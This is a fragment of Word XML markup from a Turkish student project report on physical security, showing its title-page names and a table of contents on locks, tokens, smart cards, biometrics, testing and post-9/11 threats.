          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008718A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Prof.Dr. A.Samet HAŞILOĞLU</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008718A4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:right="-293"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008718A4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:right="-293"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008718A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Proje Yürütücü</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>sü</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:line="200" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008718A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">                                  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00EB3B81" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="1416" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00902C97">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1507070</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>27</w:t>
      </w:r>
      <w:r w:rsidRPr="00902C97">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>SENANUR AYDIN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:id w:val="2132125076"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="TBal"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:color w:val="auto"/>
              <w:sz w:val="36"/>
              <w:szCs w:val="40"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00FE118D">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:color w:val="auto"/>
              <w:sz w:val="36"/>
              <w:szCs w:val="40"/>
            </w:rPr>
            <w:t>İÇİNDEKİLER</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="00037933" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="tr-TR"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="00037933" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:b/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00037933">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00037933">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00037933">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc7996866" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1. GİRİŞ</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66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4</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67" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2. FİZİKSEL GÜVENLİK</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67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4</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left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b w:val="0"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc7996868" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1</w:t>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>KISA BİR TARİHÇE</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68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5</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left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b w:val="0"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc7996869" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2</w:t>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ODAK DİKKATİNE NEREDE?</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69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5</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70" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3 Doğal Felaketler ve Kontroller</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70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6</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left" w:pos="440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              <w:b/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc7996871" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>İNSAN FAKTÖRÜ</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71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7</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72" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1 KİLİTLER</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72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7</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73" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2 JETON</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73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8</w:t>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="00037933" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="tr-TR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc7996874" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3.2.1 Mücadele-Tepki Jetonları</w:t>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc7996874 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="00037933" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="tr-TR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc7996875" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3.2.2 Salak Kartlar</w:t>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc7996875 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="00037933" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="tr-TR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc7996876" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3.2.3 Akıllı kartlar</w:t>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc7996876 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="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77" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4. Erişim Kartı Türleri</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77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9</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78" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>5. Biyometrik Cihazlar</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78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9</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79" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1 Parmak izi tarama</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79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0</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0" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2 Retina Taraması</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0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0</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1" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3 El Geometrisi</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1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0</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2" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.4 Yüz tanıma</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2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1</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83" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>6. TEST YAPMAK</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83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1</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84" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>7. ÖZET</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84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1</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85" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>8. Fiziksel güvenlik: Sonrası Tehdit 11 Eylül 2001</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85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2</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6" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.1 Amerika neden bir hedef?</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6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3</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7" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.2 Neden Endişe Edilmeli?</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7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3</w:t>
            </w:r>
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:noProof/>
                <w:webHidden/>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88" w:history="1">
            <w:r w:rsidRPr="00037933">
              <w:rPr>
                <w:rStyle w:val="Kpr"/>
